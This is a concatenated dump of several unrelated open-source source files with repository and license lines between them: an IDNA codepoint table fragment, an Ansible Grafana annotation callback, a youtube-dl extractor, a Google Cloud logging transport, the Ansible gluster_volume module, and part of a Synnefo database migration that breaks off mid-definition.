0x1bc700001bc7d,
0x1bc800001bc89,
0x1bc900001bc9a,
0x1bc9d0001bc9f,
0x1da000001da37,
0x1da3b0001da6d,
0x1da750001da76,
0x1da840001da85,
0x1da9b0001daa0,
0x1daa10001dab0,
0x1e0000001e007,
0x1e0080001e019,
0x1e01b0001e022,
0x1e0230001e025,
0x1e0260001e02b,
0x1e8000001e8c5,
0x1e8d00001e8d7,
0x1e9220001e94b,
0x1e9500001e95a,
0x200000002a6d7,
0x2a7000002b735,
0x2b7400002b81e,
0x2b8200002cea2,
0x2ceb00002ebe1,
),
'CONTEXTJ': (
0x200c0000200e,
),
'CONTEXTO': (
0xb7000000b8,
0x37500000376,
0x5f3000005f5,
0x6600000066a,
0x6f0000006fa,
0x30fb000030fc,
),
}
| apache-2.0 |
slohse/ansible | lib/ansible/plugins/callback/grafana_annotations.py | 22 | 9217 | # -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import socket
import getpass
from base64 import b64encode
from datetime import datetime
from ansible.module_utils.urls import open_url
from ansible.plugins.callback import CallbackBase
DOCUMENTATION = """
callback: grafana_annotations
callback_type: notification
short_description: send ansible events as annotations on charts to grafana over http api.
author: "Rémi REY (@rrey)"
description:
- This callback will report start, failed and stats events to Grafana as annotations (https://grafana.com)
version_added: "2.6"
requirements:
- whitelisting in configuration
options:
grafana_url:
description: Grafana annotations api URL
required: True
env:
- name: GRAFANA_URL
ini:
- section: callback_grafana_annotations
key: grafana_url
validate_grafana_certs:
description: validate the SSL certificate of the Grafana server. (For HTTPS url)
env:
- name: GRAFANA_VALIDATE_CERT
ini:
- section: callback_grafana_annotations
key: validate_grafana_certs
default: True
type: bool
http_agent:
description: The HTTP 'User-agent' value to set in HTTP requets.
env:
- name: HTTP_AGENT
ini:
- section: callback_grafana_annotations
key: http_agent
default: 'Ansible (grafana_annotations callback)'
grafana_api_key:
description: Grafana API key, allowing to authenticate when posting on the HTTP API.
If not provided, grafana_login and grafana_password will
be required.
env:
- name: GRAFANA_API_KEY
ini:
- section: callback_grafana_annotations
key: grafana_api_key
grafana_user:
description: Grafana user used for authentication. Ignored if grafana_api_key is provided.
env:
- name: GRAFANA_USER
ini:
- section: callback_grafana_annotations
key: grafana_user
default: ansible
grafana_password:
description: Grafana password used for authentication. Ignored if grafana_api_key is provided.
env:
- name: GRAFANA_PASSWORD
ini:
- section: callback_grafana_annotations
key: grafana_password
default: ansible
grafana_dashboard_id:
description: The grafana dashboard id where the annotation shall be created.
env:
- name: GRAFANA_DASHBOARD_ID
ini:
- section: callback_grafana_annotations
key: grafana_dashboard_id
grafana_panel_id:
description: The grafana panel id where the annotation shall be created.
env:
- name: GRAFANA_PANEL_ID
ini:
- section: callback_grafana_annotations
key: grafana_panel_id
"""
PLAYBOOK_START_TXT = """\
Started playbook {playbook}
From '{hostname}'
By user '{username}'
"""
PLAYBOOK_ERROR_TXT = """\
Playbook {playbook} Failure !
From '{hostname}'
By user '{username}'
'{task}' failed on {host}
debug: {result}
"""
PLAYBOOK_STATS_TXT = """\
Playbook {playbook}
Duration: {duration}
Status: {status}
From '{hostname}'
By user '{username}'
Result:
{summary}
"""
def to_millis(dt):
return int(dt.strftime('%s')) * 1000
class CallbackModule(CallbackBase):
"""
ansible grafana callback plugin
ansible.cfg:
callback_plugins = <path_to_callback_plugins_folder>
callback_whitelist = grafana_annotations
and put the plugin in <path_to_callback_plugins_folder>
"""
CALLBACK_VERSION = 2.0
CALLBACK_TYPE = 'aggregate'
CALLBACK_NAME = 'grafana_annotations'
CALLBACK_NEEDS_WHITELIST = True
def __init__(self, display=None):
super(CallbackModule, self).__init__(display=display)
self.headers = {'Content-Type': 'application/json'}
self.force_basic_auth = False
self.hostname = socket.gethostname()
self.username = getpass.getuser()
self.start_time = datetime.now()
self.errors = 0
def set_options(self, task_keys=None, var_options=None, direct=None):
super(CallbackModule, self).set_options(task_keys=task_keys, var_options=var_options, direct=direct)
self.grafana_api_key = self.get_option('grafana_api_key')
self.grafana_url = self.get_option('grafana_url')
self.validate_grafana_certs = self.get_option('validate_grafana_certs')
self.http_agent = self.get_option('http_agent')
self.grafana_user = self.get_option('grafana_user')
self.grafana_password = self.get_option('grafana_password')
self.dashboard_id = self.get_option('grafana_dashboard_id')
self.panel_id = self.get_option('grafana_panel_id')
if self.grafana_api_key:
self.headers['Authorization'] = "Bearer %s" % self.grafana_api_key
else:
self.force_basic_auth = True
if self.grafana_url is None:
self.disabled = True
self._display.warning('Grafana URL was not provided. The '
'Grafana URL can be provided using '
'the `GRAFANA_URL` environment variable.')
self._display.info('Grafana URL: %s' % self.grafana_url)
def v2_playbook_on_start(self, playbook):
self.playbook = playbook._file_name
text = PLAYBOOK_START_TXT.format(playbook=self.playbook, hostname=self.hostname,
username=self.username)
data = {
'time': to_millis(self.start_time),
'text': text,
'tags': ['ansible', 'ansible_event_start', self.playbook]
}
if self.dashboard_id:
data["dashboardId"] = int(self.dashboard_id)
if self.panel_id:
data["panelId"] = int(self.panel_id)
self._send_annotation(json.dumps(data))
def v2_playbook_on_stats(self, stats):
end_time = datetime.now()
duration = end_time - self.start_time
summarize_stat = {}
for host in stats.processed.keys():
summarize_stat[host] = stats.summarize(host)
status = "FAILED"
if self.errors == 0:
status = "OK"
text = PLAYBOOK_STATS_TXT.format(playbook=self.playbook, hostname=self.hostname,
duration=duration.total_seconds(),
status=status, username=self.username,
summary=json.dumps(summarize_stat))
data = {
'time': to_millis(self.start_time),
'timeEnd': to_millis(end_time),
'isRegion': True,
'text': text,
'tags': ['ansible', 'ansible_report', self.playbook]
}
if self.dashboard_id:
data["dashboardId"] = int(self.dashboard_id)
if self.panel_id:
data["panelId"] = int(self.panel_id)
self._send_annotation(json.dumps(data))
def v2_runner_on_failed(self, result, **kwargs):
text = PLAYBOOK_ERROR_TXT.format(playbook=self.playbook, hostname=self.hostname,
username=self.username, task=result._task,
host=result._host.name, result=self._dump_results(result._result))
data = {
'time': to_millis(datetime.now()),
'text': text,
'tags': ['ansible', 'ansible_event_failure', self.playbook]
}
self.errors += 1
if self.dashboard_id:
data["dashboardId"] = int(self.dashboard_id)
if self.panel_id:
data["panelId"] = int(self.panel_id)
self._send_annotation(json.dumps(data))
def _send_annotation(self, annotation):
try:
response = open_url(self.grafana_url, data=annotation, headers=self.headers,
method="POST",
validate_certs=self.validate_grafana_certs,
url_username=self.grafana_user, url_password=self.grafana_password,
http_agent=self.http_agent, force_basic_auth=self.force_basic_auth)
except Exception as e:
self._display.error('Could not submit message to Grafana: %s' % str(e))
| gpl-3.0 |
aboutsajjad/Bridge | app_packages/youtube_dl/extractor/worldstarhiphop.py | 57 | 1344 | from __future__ import unicode_literals
from .common import InfoExtractor
class WorldStarHipHopIE(InfoExtractor):
_VALID_URL = r'https?://(?:www|m)\.worldstar(?:candy|hiphop)\.com/(?:videos|android)/video\.php\?.*?\bv=(?P<id>[^&]+)'
_TESTS = [{
'url': 'http://www.worldstarhiphop.com/videos/video.php?v=wshh6a7q1ny0G34ZwuIO',
'md5': '9d04de741161603bf7071bbf4e883186',
'info_dict': {
'id': 'wshh6a7q1ny0G34ZwuIO',
'ext': 'mp4',
'title': 'KO Of The Week: MMA Fighter Gets Knocked Out By Swift Head Kick!'
}
}, {
'url': 'http://m.worldstarhiphop.com/android/video.php?v=wshh6a7q1ny0G34ZwuIO',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
entries = self._parse_html5_media_entries(url, webpage, video_id)
if not entries:
return self.url_result(url, 'Generic')
title = self._html_search_regex(
[r'(?s)<div class="content-heading">\s*<h1>(.*?)</h1>',
r'<span[^>]+class="tc-sp-pinned-title">(.*)</span>'],
webpage, 'title')
info = entries[0]
info.update({
'id': video_id,
'title': title,
})
return info
| mit |
jonparrott/google-cloud-python | logging/google/cloud/logging/handlers/transports/sync.py | 3 | 2028 | # Copyright 2016 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transport for Python logging handler.
Logs directly to the the Stackdriver Logging API with a synchronous call.
"""
from google.cloud.logging.handlers.transports.base import Transport
class SyncTransport(Transport):
"""Basic sychronous transport.
Uses this library's Logging client to directly make the API call.
"""
def __init__(self, client, name):
self.logger = client.logger(name)
def send(self, record, message, resource=None, labels=None,
trace=None, span_id=None):
"""Overrides transport.send().
:type record: :class:`logging.LogRecord`
:param record: Python log record that the handler was called with.
:type message: str
:param message: The message from the ``LogRecord`` after being
formatted by the associated log formatters.
:type resource: :class:`~google.cloud.logging.resource.Resource`
:param resource: (Optional) Monitored resource of the entry.
:type labels: dict
:param labels: (Optional) Mapping of labels for the entry.
"""
info = {'message': message, 'python_logger': record.name}
self.logger.log_struct(info,
severity=record.levelname,
resource=resource,
labels=labels,
trace=trace,
span_id=span_id)
| apache-2.0 |
JimCircadian/ansible | lib/ansible/modules/storage/glusterfs/gluster_volume.py | 20 | 15711 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Taneli Leppä <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: gluster_volume
short_description: Manage GlusterFS volumes
description:
- Create, remove, start, stop and tune GlusterFS volumes
version_added: '1.9'
options:
name:
description:
- The volume name.
required: true
aliases: ['volume']
state:
description:
- Use present/absent ensure if a volume exists or not.
Use started/stopped to control its availability.
required: true
choices: ['absent', 'present', 'started', 'stopped']
cluster:
description:
- List of hosts to use for probing and brick setup.
host:
description:
- Override local hostname (for peer probing purposes).
replicas:
description:
- Replica count for volume.
arbiters:
description:
- Arbiter count for volume.
version_added: '2.3'
stripes:
description:
- Stripe count for volume.
disperses:
description:
- Disperse count for volume.
version_added: '2.2'
redundancies:
description:
- Redundancy count for volume.
version_added: '2.2'
transport:
description:
- Transport type for volume.
default: tcp
choices: [ tcp, rdma, 'tcp,rdma' ]
bricks:
description:
- Brick paths on servers. Multiple brick paths can be separated by commas.
aliases: [ brick ]
start_on_create:
description:
- Controls whether the volume is started after creation or not.
type: bool
default: 'yes'
rebalance:
description:
- Controls whether the cluster is rebalanced after changes.
type: bool
default: 'no'
directory:
description:
- Directory for limit-usage.
options:
description:
- A dictionary/hash with options/settings for the volume.
quota:
description:
- Quota value for limit-usage (be sure to use 10.0MB instead of 10MB, see quota list).
force:
description:
- If brick is being created in the root partition, module will fail.
Set force to true to override this behaviour.
type: bool
notes:
- Requires cli tools for GlusterFS on servers.
- Will add new bricks, but not remove them.
author:
- Taneli Leppä (@rosmo)
"""
EXAMPLES = """
- name: create gluster volume
gluster_volume:
state: present
name: test1
bricks: /bricks/brick1/g1
rebalance: yes
cluster:
- 192.0.2.10
- 192.0.2.11
run_once: true
- name: tune
gluster_volume:
state: present
name: test1
options:
performance.cache-size: 256MB
- name: Set multiple options on GlusterFS volume
gluster_volume:
state: present
name: test1
options:
{ performance.cache-size: 128MB,
write-behind: 'off',
quick-read: 'on'
}
- name: start gluster volume
gluster_volume:
state: started
name: test1
- name: limit usage
gluster_volume:
state: present
name: test1
directory: /foo
quota: 20.0MB
- name: stop gluster volume
gluster_volume:
state: stopped
name: test1
- name: remove gluster volume
gluster_volume:
state: absent
name: test1
- name: create gluster volume with multiple bricks
gluster_volume:
state: present
name: test2
bricks: /bricks/brick1/g2,/bricks/brick2/g2
cluster:
- 192.0.2.10
- 192.0.2.11
run_once: true
"""
import re
import socket
import time
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
glusterbin = ''
def run_gluster(gargs, **kwargs):
global glusterbin
global module
args = [glusterbin, '--mode=script']
args.extend(gargs)
try:
rc, out, err = module.run_command(args, **kwargs)
if rc != 0:
module.fail_json(msg='error running gluster (%s) command (rc=%d): %s' %
(' '.join(args), rc, out or err), exception=traceback.format_exc())
except Exception as e:
module.fail_json(msg='error running gluster (%s) command: %s' % (' '.join(args),
to_native(e)), exception=traceback.format_exc())
return out
def run_gluster_nofail(gargs, **kwargs):
global glusterbin
global module
args = [glusterbin]
args.extend(gargs)
rc, out, err = module.run_command(args, **kwargs)
if rc != 0:
return None
return out
def get_peers():
out = run_gluster(['peer', 'status'])
peers = {}
hostname = None
uuid = None
state = None
shortNames = False
for row in out.split('\n'):
if ': ' in row:
key, value = row.split(': ')
if key.lower() == 'hostname':
hostname = value
shortNames = False
if key.lower() == 'uuid':
uuid = value
if key.lower() == 'state':
state = value
peers[hostname] = [uuid, state]
elif row.lower() == 'other names:':
shortNames = True
elif row != '' and shortNames is True:
peers[row] = [uuid, state]
elif row == '':
shortNames = False
return peers
def get_volumes():
out = run_gluster(['volume', 'info'])
volumes = {}
volume = {}
for row in out.split('\n'):
if ': ' in row:
key, value = row.split(': ')
if key.lower() == 'volume name':
volume['name'] = value
volume['options'] = {}
volume['quota'] = False
if key.lower() == 'volume id':
volume['id'] = value
if key.lower() == 'status':
volume['status'] = value
if key.lower() == 'transport-type':
volume['transport'] = value
if value.lower().endswith(' (arbiter)'):
if 'arbiters' not in volume:
volume['arbiters'] = []
value = value[:-10]
volume['arbiters'].append(value)
if key.lower() != 'bricks' and key.lower()[:5] == 'brick':
if 'bricks' not in volume:
volume['bricks'] = []
volume['bricks'].append(value)
# Volume options
if '.' in key:
if 'options' not in volume:
volume['options'] = {}
volume['options'][key] = value
if key == 'features.quota' and value == 'on':
volume['quota'] = True
else:
if row.lower() != 'bricks:' and row.lower() != 'options reconfigured:':
if len(volume) > 0:
volumes[volume['name']] = volume
volume = {}
return volumes
def get_quotas(name, nofail):
quotas = {}
if nofail:
out = run_gluster_nofail(['volume', 'quota', name, 'list'])
if not out:
return quotas
else:
out = run_gluster(['volume', 'quota', name, 'list'])
for row in out.split('\n'):
if row[:1] == '/':
q = re.split(r'\s+', row)
quotas[q[0]] = q[1]
return quotas
def wait_for_peer(host):
for x in range(0, 4):
peers = get_peers()
if host in peers and peers[host][1].lower().find('peer in cluster') != -1:
return True
time.sleep(1)
return False
def probe(host, myhostname):
global module
out = run_gluster(['peer', 'probe', host])
if out.find('localhost') == -1 and not wait_for_peer(host):
module.fail_json(msg='failed to probe peer %s on %s' % (host, myhostname))
def probe_all_peers(hosts, peers, myhostname):
for host in hosts:
host = host.strip() # Clean up any extra space for exact comparison
if host not in peers:
probe(host, myhostname)
def create_volume(name, stripe, replica, arbiter, disperse, redundancy, transport, hosts, bricks, force):
args = ['volume', 'create']
args.append(name)
if stripe:
args.append('stripe')
args.append(str(stripe))
if replica:
args.append('replica')
args.append(str(replica))
if arbiter:
args.append('arbiter')
args.append(str(arbiter))
if disperse:
args.append('disperse')
args.append(str(disperse))
if redundancy:
args.append('redundancy')
args.append(str(redundancy))
args.append('transport')
args.append(transport)
for brick in bricks:
for host in hosts:
args.append(('%s:%s' % (host, brick)))
if force:
args.append('force')
run_gluster(args)
def start_volume(name):
run_gluster(['volume', 'start', name])
def stop_volume(name):
run_gluster(['volume', 'stop', name])
def set_volume_option(name, option, parameter):
run_gluster(['volume', 'set', name, option, parameter])
def add_bricks(name, new_bricks, stripe, replica, force):
args = ['volume', 'add-brick', name]
if stripe:
args.append('stripe')
args.append(str(stripe))
if replica:
args.append('replica')
args.append(str(replica))
args.extend(new_bricks)
if force:
args.append('force')
run_gluster(args)
def do_rebalance(name):
run_gluster(['volume', 'rebalance', name, 'start'])
def enable_quota(name):
run_gluster(['volume', 'quota', name, 'enable'])
def set_quota(name, directory, value):
run_gluster(['volume', 'quota', name, 'limit-usage', directory, value])
def main():
# MAIN
global module
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True, aliases=['volume']),
state=dict(type='str', required=True, choices=['absent', 'started', 'stopped', 'present']),
cluster=dict(type='list'),
host=dict(type='str'),
stripes=dict(type='int'),
replicas=dict(type='int'),
arbiters=dict(type='int'),
disperses=dict(type='int'),
redundancies=dict(type='int'),
transport=dict(type='str', default='tcp', choices=['tcp', 'rdma', 'tcp,rdma']),
bricks=dict(type='str', aliases=['brick']),
start_on_create=dict(type='bool', default=True),
rebalance=dict(type='bool', default=False),
options=dict(type='dict', default={}),
quota=dict(type='str'),
directory=dict(type='str'),
force=dict(type='bool', default=False),
),
)
global glusterbin
glusterbin = module.get_bin_path('gluster', True)
changed = False
action = module.params['state']
volume_name = module.params['name']
cluster = module.params['cluster']
brick_paths = module.params['bricks']
stripes = module.params['stripes']
replicas = module.params['replicas']
arbiters = module.params['arbiters']
disperses = module.params['disperses']
redundancies = module.params['redundancies']
transport = module.params['transport']
myhostname = module.params['host']
start_on_create = module.boolean(module.params['start_on_create'])
rebalance = module.boolean(module.params['rebalance'])
force = module.boolean(module.params['force'])
if not myhostname:
myhostname = socket.gethostname()
# Clean up if last element is empty. Consider that yml can look like this:
# cluster="{% for host in groups['glusterfs'] %}{{ hostvars[host]['private_ip'] }},{% endfor %}"
if cluster is not None and len(cluster) > 1 and cluster[-1] == '':
cluster = cluster[0:-1]
if cluster is None:
cluster = []
if brick_paths is not None and "," in brick_paths:
brick_paths = brick_paths.split(",")
else:
brick_paths = [brick_paths]
options = module.params['options']
quota = module.params['quota']
directory = module.params['directory']
# get current state info
peers = get_peers()
volumes = get_volumes()
quotas = {}
if volume_name in volumes and volumes[volume_name]['quota'] and volumes[volume_name]['status'].lower() == 'started':
quotas = get_quotas(volume_name, True)
# do the work!
if action == 'absent':
if volume_name in volumes:
if volumes[volume_name]['status'].lower() != 'stopped':
stop_volume(volume_name)
run_gluster(['volume', 'delete', volume_name])
changed = True
if action == 'present':
probe_all_peers(cluster, peers, myhostname)
# create if it doesn't exist
if volume_name not in volumes:
create_volume(volume_name, stripes, replicas, arbiters, disperses, redundancies, transport, cluster, brick_paths, force)
volumes = get_volumes()
changed = True
if volume_name in volumes:
if volumes[volume_name]['status'].lower() != 'started' and start_on_create:
start_volume(volume_name)
changed = True
# switch bricks
new_bricks = []
removed_bricks = []
all_bricks = []
for node in cluster:
for brick_path in brick_paths:
brick = '%s:%s' % (node, brick_path)
all_bricks.append(brick)
if brick not in volumes[volume_name]['bricks']:
new_bricks.append(brick)
# this module does not yet remove bricks, but we check those anyways
for brick in volumes[volume_name]['bricks']:
if brick not in all_bricks:
removed_bricks.append(brick)
if new_bricks:
add_bricks(volume_name, new_bricks, stripes, replicas, force)
changed = True
# handle quotas
if quota:
if not volumes[volume_name]['quota']:
enable_quota(volume_name)
quotas = get_quotas(volume_name, False)
if directory not in quotas or quotas[directory] != quota:
set_quota(volume_name, directory, quota)
changed = True
# set options
for option in options.keys():
if option not in volumes[volume_name]['options'] or volumes[volume_name]['options'][option] != options[option]:
set_volume_option(volume_name, option, options[option])
changed = True
else:
module.fail_json(msg='failed to create volume %s' % volume_name)
if action != 'delete' and volume_name not in volumes:
module.fail_json(msg='volume not found %s' % volume_name)
if action == 'started':
if volumes[volume_name]['status'].lower() != 'started':
start_volume(volume_name)
changed = True
if action == 'stopped':
if volumes[volume_name]['status'].lower() != 'stopped':
stop_volume(volume_name)
changed = True
if changed:
volumes = get_volumes()
if rebalance:
do_rebalance(volume_name)
facts = {}
facts['glusterfs'] = {'peers': peers, 'volumes': volumes, 'quotas': quotas}
module.exit_json(changed=changed, ansible_facts=facts)
if __name__ == '__main__':
main()
| gpl-3.0 |
grnet/synnefo | snf-cyclades-app/synnefo/db/migrations/old/0086_auto__add_ipaddresslog.py | 10 | 19362 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'IPAddressLog'
db.create_table('db_ipaddresslog', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('address', self.gf('django.db.models.fields.CharField')(max_length=64, db_index=True)),
('server_id', self.gf('django.db.models.fields.IntegerField')()),
('network_id', self.gf('django.db.models.fields.IntegerField')()),
('allocated_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('released_at', self.gf('django.db.models.fields.DateTimeField')(null=True)),
('active', self.gf('django.db.models.fields.BooleanField')(default=True)),
))
db.send_create_signal('db', ['IPAddressLog'])
def backwards(self, orm):
# Deleting model 'IPAddressLog'
db.delete_table('db_ipaddresslog')
models = {
'db.backend': {
'Meta': {'ordering': "['clustername']", 'object_name': 'Backend'},
'clustername': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'ctotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'dfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'disk_templates': ('synnefo.db.fields.SeparatedValuesField', [], {'null': 'True'}),
'drained': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'dtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'hypervisor': ('django.db.models.fields.CharField', [], {'default': "'kvm'", 'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'unique': 'True'}),
'mfree': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'mtotal': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offline': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'password_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'pinst_cnt': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'port': ('django.db.models.fields.PositiveIntegerField', [], {'default': '5080'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'})
},
'db.backendnetwork': {
'Meta': {'unique_together': "(('network', 'backend'),)", 'object_name': 'BackendNetwork'},
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'networks'", 'on_delete': 'models.PROTECT', 'to': "orm['db.Backend']"}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mac_prefix': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'backend_networks'", 'to': "orm['db.Network']"}),
'operstate': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '30'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'db.bridgepooltable': {
'Meta': {'object_name': 'BridgePoolTable'},
'available_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'base': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offset': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'reserved_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'size': ('django.db.models.fields.IntegerField', [], {})
},
'db.flavor': {
'Meta': {'unique_together': "(('cpu', 'ram', 'disk', 'disk_template'),)", 'object_name': 'Flavor'},
'cpu': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'disk': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'disk_template': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ram': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'db.ipaddress': {
'Meta': {'unique_together': "(('network', 'address'),)", 'object_name': 'IPAddress'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'floating_ip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'to': "orm['db.Network']"}),
'nic': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.NetworkInterface']"}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.QuotaHolderSerial']"}),
'subnet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ips'", 'to': "orm['db.Subnet']"}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'})
},
'db.ipaddresslog': {
'Meta': {'object_name': 'IPAddressLog'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'address': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_index': 'True'}),
'allocated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'network_id': ('django.db.models.fields.IntegerField', [], {}),
'released_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'server_id': ('django.db.models.fields.IntegerField', [], {})
},
'db.ippooltable': {
'Meta': {'object_name': 'IPPoolTable'},
'available_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'base': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offset': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'reserved_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'subnet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'ip_pools'", 'null': 'True', 'to': "orm['db.Subnet']"})
},
'db.macprefixpooltable': {
'Meta': {'object_name': 'MacPrefixPoolTable'},
'available_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'base': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offset': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'reserved_map': ('django.db.models.fields.TextField', [], {'default': "''"}),
'size': ('django.db.models.fields.IntegerField', [], {})
},
'db.network': {
'Meta': {'object_name': 'Network'},
'action': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '32', 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'drained': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'external_router': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'flavor': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'floating_ip_pool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'mac_prefix': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'machines': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['db.VirtualMachine']", 'through': "orm['db.NetworkInterface']", 'symmetrical': 'False'}),
'mode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'network'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.QuotaHolderSerial']"}),
'state': ('django.db.models.fields.CharField', [], {'default': "'PENDING'", 'max_length': '32'}),
'tags': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'})
},
'db.networkinterface': {
'Meta': {'object_name': 'NetworkInterface'},
